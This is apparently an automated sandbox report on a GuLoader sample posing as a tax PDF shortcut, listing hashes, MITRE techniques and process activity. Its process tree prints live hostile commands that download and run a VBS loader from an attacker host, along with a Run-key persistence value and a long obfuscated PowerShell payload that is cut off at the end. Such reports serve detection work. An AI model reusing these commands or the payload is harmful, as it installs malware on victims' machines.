guloader | 3fb8bf3a22c854a1b7f94dcbbdf647036cce8ba7353d8358e5f0fb94a5a0df76

General

Target

FedTaxUS2021/FedTaxUS.pdf.lnk
Size

2KB
MD5

83c0ef791c1898ea398b8f3f5d45d373
SHA1

b2921d538d998101e7d1c348fa4b0420395b01d3
SHA256

de78ba7cedda5de72f399a0bd7b597e880ebd517144bbeb2dd0a4e12d353d749
SHA512

a76d11bcce8226b36fbfb32b94dbb16b63201254cdde9a063300649ff8234002aefdd37c932abbdc0c15bdade261ff4668b73413d5a4a904e85a67917bac9732

Score

10^/10

guloader downloader persistence

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

10 1464 powershell.exe

flow	pid	process
10	1464	powershell.exe

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

Processes:

powershell.exeieinstal.exe

description	ioc	process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	ieinstal.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cmd.exeWScript.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

ieinstal.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Software\Microsoft\Windows\CurrentVersion\Run	ieinstal.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\prosed = "%SaltoQ% -w 1 $Sagnagtiges=(Get-ItemProperty -Path 'HKCU:\\Cotqueans55\\').stomium;%SaltoQ% ($Sagnagtiges)"	ieinstal.exe

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

Processes:

ieinstal.exe

pid process

2168 ieinstal.exe
2168 ieinstal.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exeieinstal.exe

pid process

2660 powershell.exe
2168 ieinstal.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2660 set thread context of 2168 2660 powershell.exe ieinstal.exe
Drops file in Windows directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\Tasks\Serolere.vbs powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
2168	ieinstal.exe
2168	ieinstal.exe

pid	process
2660	powershell.exe
2168	ieinstal.exe

description	pid	process	target process
PID 2660 set thread context of 2168	2660	powershell.exe	ieinstal.exe

description	ioc	process
File created	C:\Windows\Tasks\Serolere.vbs	powershell.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AcroRd32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

AcroRd32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 2 IoCs

Processes:

cmd.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 27 IoCs

Processes:

powershell.exepowershell.exepowershell.exeAcroRd32.exe

pid	process
1464	powershell.exe
1464	powershell.exe
4144	powershell.exe
4144	powershell.exe
2660	powershell.exe
2660	powershell.exe
2660	powershell.exe
3460	AcroRd32.exe
3460	AcroRd32.exe
3460	AcroRd32.exe
3460	AcroRd32.exe
3460	AcroRd32.exe
3460	AcroRd32.exe
3460	AcroRd32.exe
3460	AcroRd32.exe
3460	AcroRd32.exe
3460	AcroRd32.exe
3460	AcroRd32.exe
3460	AcroRd32.exe
3460	AcroRd32.exe
3460	AcroRd32.exe
3460	AcroRd32.exe
3460	AcroRd32.exe
3460	AcroRd32.exe
3460	AcroRd32.exe
3460	AcroRd32.exe
3460	AcroRd32.exe

Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

powershell.exe

pid process

2660 powershell.exe
2660 powershell.exe
2660 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1464 powershell.exe
Token: SeDebugPrivilege 4144 powershell.exe
Token: SeDebugPrivilege 2660 powershell.exe
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

AcroRd32.exe

pid process

3460 AcroRd32.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

AcroRd32.exeieinstal.exe

pid process

3460 AcroRd32.exe
3460 AcroRd32.exe
3460 AcroRd32.exe
3460 AcroRd32.exe
3460 AcroRd32.exe
2168 ieinstal.exe

pid	process
2660	powershell.exe
2660	powershell.exe
2660	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1464	powershell.exe
Token: SeDebugPrivilege	4144	powershell.exe
Token: SeDebugPrivilege	2660	powershell.exe

pid	process
3460	AcroRd32.exe

pid	process
3460	AcroRd32.exe
3460	AcroRd32.exe
3460	AcroRd32.exe
3460	AcroRd32.exe
3460	AcroRd32.exe
2168	ieinstal.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exeWScript.exepowershell.exeWScript.exepowershell.exeAcroRd32.exeRdrCEF.exe

description	pid	process	target process
PID 2032 wrote to memory of 1740	2032	cmd.exe	WScript.exe
PID 2032 wrote to memory of 1740	2032	cmd.exe	WScript.exe
PID 1740 wrote to memory of 1464	1740	WScript.exe	powershell.exe
PID 1740 wrote to memory of 1464	1740	WScript.exe	powershell.exe
PID 1464 wrote to memory of 2548	1464	powershell.exe	WScript.exe
PID 1464 wrote to memory of 2548	1464	powershell.exe	WScript.exe
PID 1464 wrote to memory of 3460	1464	powershell.exe	AcroRd32.exe
PID 1464 wrote to memory of 3460	1464	powershell.exe	AcroRd32.exe
PID 1464 wrote to memory of 3460	1464	powershell.exe	AcroRd32.exe
PID 2548 wrote to memory of 4144	2548	WScript.exe	powershell.exe
PID 2548 wrote to memory of 4144	2548	WScript.exe	powershell.exe
PID 4144 wrote to memory of 2660	4144	powershell.exe	powershell.exe
PID 4144 wrote to memory of 2660	4144	powershell.exe	powershell.exe
PID 4144 wrote to memory of 2660	4144	powershell.exe	powershell.exe
PID 3460 wrote to memory of 4272	3460	AcroRd32.exe	RdrCEF.exe
PID 3460 wrote to memory of 4272	3460	AcroRd32.exe	RdrCEF.exe
PID 3460 wrote to memory of 4272	3460	AcroRd32.exe	RdrCEF.exe
PID 3460 wrote to memory of 1348	3460	AcroRd32.exe	RdrCEF.exe
PID 3460 wrote to memory of 1348	3460	AcroRd32.exe	RdrCEF.exe
PID 3460 wrote to memory of 1348	3460	AcroRd32.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 320	4272	RdrCEF.exe	RdrCEF.exe
PID 4272 wrote to memory of 3824	4272	RdrCEF.exe	RdrCEF.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\FedTaxUS2021\FedTaxUS.pdf.lnk
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2032

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "\\localhost\c$\Windows\System32\SyncAppvPublishingServer.vbs" n; Invoke-WebRequest http://0xC2.11808979/nini/Leekish.vbs -OutFile C:\Windows\Tasks\Serolere.vbs; C:\Windows\Tasks\Serolere.vbs; Invoke-WebRequest http://0xC2.11808979/nini/info.pdf -OutFile C:\Users\Public\info.pdf; C:\Users\Public\info.pdf
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1740

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n; Invoke-WebRequest http://0xC2.11808979/nini/Leekish.vbs -OutFile C:\Windows\Tasks\Serolere.vbs; C:\Windows\Tasks\Serolere.vbs; Invoke-WebRequest http://0xC2.11808979/nini/info.pdf -OutFile C:\Users\Public\info.pdf; C:\Users\Public\info.pdf}
3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1464

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Windows\Tasks\Serolere.vbs"
4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2548

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tjringernes = """Diu;DyrFAttuEncnNatcWootLobiLsioReknUnd AlmSBireratlUnsvTopmTiloplurDandRussEurfEseoDanrGogsEaggTeleTolnHareVal0Hew Dag{Int Ree Usp Mta StnpRedaAntrCecagummRum(hub[SamSDistoghrStriCrenUnrgPer]Bri<fikHSpioReloFrnkSjoaeksrConoUmboIntnSuc)Adn;Ort Bag Mor Smu bro<RomsGenlThaaErogbolrguleUncgKlanOtieConnDin Tan=Sky TopNAtoeAntwSpi-ForOmodbRecjKloeHeicHegtShe FilbSveyVritdiseGen[Org]Sta Dds(Hib<StrHOproLatoFotkKnuaParrTrroDocoAutnele.BraLSyneUntnStagEnktProhSpr Men/Cal skv2Unk)Los;Tha Bin Sep Fid SpdFUdsoTrarMen(afs<IrrBEureRotdStdsUnotSamePaamEcodActrEnjeUds=Bri0Woo;Yve Bem<GamBTreeAfsdLicsTiltUnseQuamPoldSodrlieeBat Ily-OvelpretSti Ser<BesHToeoEnzoSkukRimaMatrHanoBeeoSecnEne.MatLLadeAtinBitgCretTilhUlt;Bra Eff<TumBHjeeMaldIntsSoftTeaeObsmmntdTenrEpoeUnj+Ann=Fir2uls)Cym{Tal Not Eje Kon Obj non Duo Ret End<DobsClalEftaSpegSarrArceUprgKilnHaaeAutnCod[vin<ortBSkieEnhdTuksContIcheConmMiddManrTaleOrt/Sto2Sph]Hal non=Gli Kdf[AcccenkoSkonKnovCrieUlurTeltRiv]Amo:Ebe:FjeTEmpoIlgBregySnetFroesaa(Off<MetHKogoGuloAlukStiaArcrLeuoOmboPutnMed.KovSgreuAnsbGlesSeltViorDreiBonnSnegDat(Lej<TelBEfteInddAjesBootBroeEftmMaddsvarSkoeGal,Slu Dis2Unf)Brl,Pla Deb1Por6Cyt)Ven;Gab Vkn Meg<PresLanlTomaStrgitsrRuseAnngFinnPiteKnsnGre[Neu<EryBMeneUltdUnqsKontSpneEromStvdKharSteesem/Sam2Scl]Bul God=Sti tal(Kmp<NatsEpildybaStegNonrTakeSulgCadnTideExpnRen[Hjl<TakBIndeDiodfassTwitSlueEspmStrdPerrtuteRen/Mot2Pel]Aku Con-DisbSlixBudoCoprBet Cyr2Alg1Zep0Sto)Mik;Hyl Sub Eye Int Inv}trn Tmn[MarSAlltdiarGutiBranJohgupt]rol[ForSPreyAppsSprtTaneSttmDra.wirTSageMasxKkktRhi.PalENomnTracPjaoGjedApoiUnpnRulgfor]Pan:hel:PhoABetSProCBssIReaITal.CopGBraeNontBlgSDolttourAntiNeonSibgSem(Ind<frisForlkroaNitgBybrFjeeSkugDoknLideActnCur)mat;ser}Res<EvoFKphoSprrAfslLeiadamdDigeBaglUdesbunePisnBiosJen0For=ConSVejeKvilUncvTotmAfloGenrInfdBousDevfFinoAfsrHydsModgDeneKornSkreNai0Pap Dlg'bil8Hom1FinAUndBperADiv1polABag6RatBBan7OrkBCapFSanFKniCAfsBCha6CylBSvaEHunBLamEUna'Ent;Coa<FinFDamoUnfrWimlAmoaKridClaeSallbrosFroeFidnGeosEne1Udl=DelSMeteBeclStovTammHeioHyprKardBoosTrefForoKogrTobsForgtheeStinFoleCon0Ind Hun'Sub9KenFcubBUnsBParBDev1lieARat0MalBCurDudpABar1datBMulDAfsBCur4PseAOkt6FabFEphCAas8Dec5PejBunmBUndBStuCSpaEcol1BolEste0MigFBahCSem8Akt7PreBswaCPosAMat1SkyBDec3UnaBAnp4BraBByz7Spo9StrCPrcBUni3bevAArt6CanBSorBDulACen4ManBRes7Taa9AktFVokBBru7BekAGlu6HonBHanATanBPtoDHicBSpa6GasASuc1Tib'Mal;Gra<SjaFEvaoGstrRatlAnlaOmpdBafeKiblCutsNatePlanChysMer2Gla=TriSDepeDialSnevBesmNavoCebrtildFrisHagfHaaoTelrVaasdougKuveRegngoseVes0Vej gri'mor9Muc5TreBFyl7StiAFre6Alu8Tri2RaiAtil0GimBUpcDVolBTry1Alk9Und3PenBNat6jemBDeb6BunADim0HisBTeg7BimAses1selAUnp1Fys'Aro;Sel<SniFKanoRygrKodlSouaGardDageJadlNaasseleDranBagsArb3Ins=ansSAbseSkrlSpivDismUnsoIsorGladSejsBlefFagoAnirSanseragwooeStonAbseTri0cer Ana'Svr8Ber1UndALilBwayAChe1MisARev6GanBBje7RegBSerFYnkFUnnCShi8Non0SouAKla7GerBSmiCTidAEne6BrsBSinBAutBForFProBise7SpoFPseCsik9AltBBroBMavCMonASar6BraBBos7ArtALeo0AtoBDedDCouANaz2Ari8Blg1FlaBMin7algAKon0WorAKal4TelBRaaBDufBEpi1HidBOut7ComACen1FaaFpalCBle9LedAvinBSni3birBNonCBenBRor6OveBsnyETakBPec7Tou8Qua0GerBUns7MtnBFor4Bra'Afl;Ask<UdpFSuboEffrMedlGifaRakdYeleSpelabssUdleExtnAussTer4Adj=SkoSLigeOmhlSolvSermSpaoBikrFlgdSmasPekfFamoEpirPaasDuogSaceBednNireBes0Kur Car'HagASpo1LeeAOdy6KuvAUng0CleBExuBAntBLatCGadBShi5tra'Rem;Rdb<ImdFautoForrUdrlFrgaSteddateGynlSlusRaaeOxynDifsLou5Gon=lifSHuseUdslStkvEupmGrioSterBivdIsosDivfAdfoAverSprsTragAtoeRoknSlaebro0Met Bru'Sli9Bev5FibBSac7SprABrd6Kbm9TweFJacBUndDFelBApo6galASte7DanBrstERanBNon7Dee9eliArefBomb3NaiBInfCSpaBLsr6SacBAntEBasBSub7Udt'Res;End<MonFsusoSnarLeplOutaHrgdCyaeHomlBegsCreePonnNdssQua6Tek=SynSForeWarlTimvPatmUnpoEgorAsodGolstekfFjeoEgerRevsProgAfseBacnSiseFle0Fie Gra'Utu8Man0Ref8Unb6For8dok1OpsAMan2OevBAnt7adnBInt1CitBProBBanBHex3FraBHepEMar9BrnCtheBBio3keyBOatFPusBSti7ArhFBibEUttFSkr2Pro9ReeARusBValBRaiBSte6CelBDis7Jum9sup0FarAGymBCha8Vae1MinBPenBFitBPho5IndFginEKejFCoc2Tra8Und2RefACri7VilBSpe0UdtBOpgETraBPorBProBSof1Til'Iso;Pav<NonFPedoKumrUdhlconaRatdKoneStilovesForeFlsnHjessel7Nor=InhSSpaeSkrlChevHusmNedoFlsrEnddUnssCaefValoModrFoosStagKileUltnChaeGer0Pud Fus'Ris8Pro0MilANds7TrsBUdkCOffABoo6HovBSpaBFumBBreFlidBInd7UnfFAveEPrsFRav2Bon9IndFEmuBSan3SpoBReaCBogBHva3ModBTit5UpsBGal7VedBKil6tra'Luf;Adj<TelFTreoAstrSynlRegavasdDeseBoaltrisBipeFrenRefsCym8Paa=bloSNsteaqulMetvLevmNonoHisrStodkvasSurfKanoImprRaasFolgSkseBronWideDyr0Bin Afb'Bro8Ber0StrBUrs7MinBWin4PinBEloEUloBTro7RevBRep1NatAChe6VmmBBas7TenBMaz6Bun9Gan6BovBSen7TorBOxyEkliBBet7TocBDea5FjeBCon3FrsAHal6AfdBDes7Ped'Bro;Zon<DefFfasoAntrNonlDouaMejdPolePgalIsosUpaeSornCassTak9Def=PriSAsteToclDravKammUdvoStarprodAntsDiafSpooGulrClisBongCopeCinnOmseWai0Tig Hor'pre9LupBUnpBYurCBou9CusFGioBBli7lodBLowFTidBFarDCamAVel0MycAHeaBDag9BdrFBolBHjlDVivBSpr6EryAKru7ProBTenEOmbBZoo7Lib'Tom;tnd<RntRBloaCaluAntgBayhTrytRec0Maj=NotSZooeMuslErovEscmTitoPitrThrdAngsDatfunsoKoarEftsSlvgStoeCirnInseAnt0Bil Wd 'Lej9EnuFSamADeeBSik9Til6LigBSpe7AssBSkeEDglBHej7ComBTaf5sekBNon3SkmASpo6ConBAsh7kry8Lem6kanAInrBForAUnd2ClaBUnf7Cen'inf;Ind<PerRTyraPriuurigcirhTertEma1Udr=ParSEndeDislSemvSvamPaloSafrPemdUndsBoyfPeroRkkrFidsHikgSageSplnMideRhy0Url des'Ele9Bas1SpoBkarETaaBPro3NonAClu1PatAUpc1ChaFMenEPreFArt2Ple8Unc2AkuAFon7FolBEnt0FerBCreEGufBPouBLeuBRes1FigFForEvurFZyg2Unf8Cal1GugBPor7TheBGwe3EmbBUndEPreBSum7TheBRea6PreFCocEAntFDes2Met9Jag3CyaBMisCaffAHer1mudBHalBLec9Hje1TopBVenEPosBUly3SadASem1PneASum1SepFSvrEDanFNve2San9Tyl3PreASta7VanAGre6SanBSecDkry9Til1ShoBTarEResBCet3rejARes1BesAFri1Sku'Bek;Cli<TerRSagaCoauSsogHathMeltpol2Lag=floSReaeSenlMouvDeomMysoAnnrJyldFilsBisfOspoBrerSoasforgBraeFjenSpoeHol0Inc Vok'Cin9TetBphoBMedCDafADis4NovBPerDKilBObd9AdwBBap7Ind'Rus;Ros<IndRKanaSaguBelgSrrhBrttMai3Ska=AliSAnieTyrlAlkvGramreloIstrHypdMedsNarfstooIndrSlosTaggGiaeErfnUnreLon0res Beg'Cor8Abs2BidAImp7SikBAge0uptBModEShaBalvBMisBIna1SkrFBloESheFBea2Bag9CowAAndBBrnBPhrBtek6HarBbes7Far9Ord0OrkACloBFlb8Mad1MilBAnsBTerBRea5athFSynECotFSun2Spi9BetCUsoBFra7UdlABer5Dol8Let1DesBBleEtogBCloDSubAHad6nedFOveEOveFNon2trf8Dec4IntBoliBMgrATug0WarAcon6JvnAStr7SmaBMar3TriBOpsEDyk'pyr;Run<GenRPacaFriuTergNonhRrltAfd4Rec=SjoSReseMixlKadvBeimCynoBarrStidHassOfffMidoUnsrbessKosgLoveUnsnNateGud0Det For'Usu8Tve4HalBLysBDefAOpe0RetADes6IntAslu7ForBDef3CenBAktEPas9Van3BirBTruEVilBCreEMomBFulDSarBCom1Sti'Tri;Fli<RadRDgeaBiluspagStbhLabtstr5Tan=NavSForeRellAktvBevmBacoForrautdTansBecfRumoVimrBeosNongBaceidinMoneove0For Hal'KomBBalCStrAAly6GurBSte6StaBAllEWhiBSprEKla'Ant;Cad<KbsRConaRemuMingBinhPartTri6Prp=disSGaleZoolSuivAnsmKvaofigrepidKinsFanfTraogenrNonsRougGeneTopnAegeEpi0Cos Hal'Non9TubCStoASub6Cot8Ste2SauAMul0BrsBkolDDepAKom6CouBReg7SfoBSup1PaaACor6Ren8Agg4NonBPhoBSalAAbn0BizAFlo6GalATer7EvaBSha3GruBSkiEPre9symFmotBNon7SkaBTesFWalBwilDsmaAAfh0OpdAParBBro'Pro;Sli<stuRHarawhauElvgMoohFlitDra7Ove=ForSDiteKoblDifvIndmDetoNonrskodAstsKarfMoroDesrAllsSpogFileDisnFrieBom0Tsk Non'Paa9HonBMor9gar7Bog8OpbATem'Vio;Rrb<DesRMouaTiauTilgMarhTrotMai8Kro=LatSCoueGodlThuvAmemFiroSenrNondEmbsBevfexeoddsrTersBongMixetvanBedeNic0Fas Ruf'Pro8DemENap'Ind;int<KvlABygdTridBaliNeicHk tOveiTvioChinSpi=LgnSBeleTonlMonvKuvmSelofllrFordAposBeffChrolufrEursSulgBoxeFljnAlkelui0Rum Loc'Aja8Ora7ren8Thr1Spu9Ban7Une8Qat0DisEkam1OosEMag0Boe'sis;unc<HukBEgeeShaaSyvuInctNeuiHysftyriJareAfbrRamsIso=MinSEleeAnglTapvMesmBeroGrerSdidGensTanfMatoSkarRetsMusgOrdeKonnBooeSlu0Cod Sto'Des9Aan1RefBLux3TviBLatEEneBcruEZed8Lin5SpaBSivBOveBRenCOswBAlt6GenBNagDRegACar5Gru8Col2StrAfor0StuBHysDRavBNon1Cur9Urf3Ind'Sal;GazfOveuCoonShocSubtForiNonoentnNoe RneSTaleTyklSedvStamAnkoDisrRebdUdlsRekftowoBerrLdssUgegregeJurnTileTae2Bru2Ber Arb{RykPSkuaAdsrNonaParmHaa Chr(Yde<PaaaByguBictKuroSporYociErksFigaFactFruiEftoZornAnt,Hub Bro<pylNHelaSoljAnteReddSupeSubsBin)Ind Occ Bap Enc Hyp For;Ter<HanPSluhDaaeMisrEjeeTrocGlirBjeaAfbtSnoiSpacBal0asy Tet=GenSAfledyrlReivTremScaoAfprApodOplsrygfCoroSprrPiasDysgUndeNitnHoseSgs0Awe Sla'StjFSve6Kre9DucFBroAUdlBPogBIncESveBRek6quiASmr0EjeBTys7NinAExt6HieBpseBSloBCom6KueBPri7ChaARom0PraAPli1KatFAut2PreEInsFMacFPos2AgmFSakAAng8Elf9Kla9Agt3GalAGam2GnuAKao2Cas9Eft6UdkBAntDperBRegFadmBKuw3AntBSpaBCoaBnedCBed8SupFDisEUro8VilEBan8Inc9fil1LifASun7PinAAni0IngAPer0HjeBOve7traBjerCSurAmis6Tet9Raf6GalBsamDZooBfunFLinBAig3disBNelBOmpBHomCTraFMulCOve9Spo5zarBPun7fodAFel6Trs9Dip3AccASen1DamAMik1ArbBDep7NosBBerFBubBUnh0SprBForEFlaBAksBBegBExa7AviALat1OveFCelAVekFManBHypFSoa2Hr AReiESocFKon2Car8Mon5TeaBEthAVarBLrd7XanAIno0femBSna7AmaFUnsFWal9DryDBydBRus0AnkBBac8NamBSty7PhoBCym1AfrALea6VilFFor2VilAmon9StuFSyn2RykFFej6Aju8TilDUnmFRemCenk9Ven5SalBDamESupBUnaDLydBMin0ChiBPre3BibBKlaEPoi9Int3RecACut1parASte1FinBTil7KerBGaiFHocBred0RipBmllEMorATikBEye9Mis1SkuBOmm3CarBSub1AtrBLenADaaBZil7SkaFMos2anaFkjaFinf9Uty3TmtBfolCFriBEve6AfkFSat2StaFPre6Dja8UdhDDkmFbesCRet9StiEGopBTemDNonBGar1FagBGen3ShaAFre6HetBHarBEnzBMasDPulBpatCskrFEndCReg8Mas1HaaABre2LreBSjaEepiBStoBEleAPar6UdkFAftANonFUni6Ocu8Pro0SphBPre3TjeASpe7KapBTeb5EroBObsAConAStj6BryEBruAVelFFinBSid8Res9TypFRetFIntESid3Con8BalFForFIntCOpe9Gen7PilAEft3JouAFee7FelBSpk3AfkBOveESamAint1BolFSchATriFHar6Con9Gam4DyrBSurDTrsAatl0AlsBProEPerBZeo3HemBOxy6SmeBOve7StrBdesEGenAMon1AanBBix7UdpBHylCAflABrn1SitEUnd2DisFErhBUncFSca2FalAHatFDydFInkBkysFhumCPas9sam5JocBTre7UenARho6Int8Har6fisAOpiBPacASpr2StaBPou7SbeFUndABurFRes6Non9Kon4RelBnybDKemABeg0marBKonEFleBmis3SthBFir6KosBBra7AndBForEIntAinc1SogBFla7CatBReaCHinAHer1LutEVer3EurFSamBSur'Trs;Ped.Smo<SemRQuaaOpsufejgFilhFiltSta7Afs cos<NonPOpehHenefryrSameBylcPejrAcoaContSatihancSyn0Cin;Vek<StiPAbhhFopeStarGyreCopcAbsrLseaFimtKeriDegcSuk5Bon Und=For TraSWhieKablMetvStrmLisoTrerLasdKrasAthfYouoDosrIrisexcgMageToonPaaeHer0Cha Kon'EnvFxen6Jun8Ana1SveBSup7PreBPraCDekBUne6UndBSma7umeBVan0KioATem7StbBVis6filBTia6DesBSul7LunAScr6SubAKvi1SulFFin2pyrEmanFTodFSmo2SneFGrm6Kar9VerFChrAComBGalBSpeECopBAqu6ArcATem0VisBAns7EmuAstv6ForBSpaBVagBChe6TelBflo7LatAUlt0AdeANeu1BewFStaCSmu9Fur5ForBBlu7AdsABro6Adv9BegFShaBArc7SrlASte6SpeBmanABohBNonDDesBDek6LteFKikASkaFFri6Fee9Cla4FelBSamDNonASta0FriBOccEDonBGeo3IzcBSup6SlaBNys7CheBTarESynAGen1FylBEmp7FelBpoiCParASon1PrdEskr0AmoFAgaEOveFtea2Fri8Isc9Skk8She6IndAEpaBStrAPec2SveBPal7Ich8Ste9Eir8DrsFFre8votFEngFCho2Pis9Rud2EthFBacALivFBad6Win9Bar4parBGenDAbsASva0WeeBNivEUniBBoj3ForBSem6AssBmes7BetBCarEAstARid1BisBKun7mulBVerCStuASke1EnsETri1AfsFNicEFejFBun2ParFAus6Raa9Sup4aveBGamDIneAFil0EksBSamEsolBFor3AntBAfr6PenBPol7KatBSprEStaAPle1PasBEjn7FldBExiCAkkAPos1steEUnr6MarFValBKolFTibBpyg'Unv;Flo.maa<HulRDataLysuFyrgDighDentOpk7Til Kva<UnpPUnghDraeEmmrStreStucAxirMalajortNodiParcOut5Hyp;eng<StrPBenhSideGenrUndeDamcStyrFreaEfttSlaiBaicSex1Aft Num=bos TalSLaneKollFryvSidmRejoKnirIrkdprosSurffryoElerCofsBrogalbeCatnSkoerig0doe 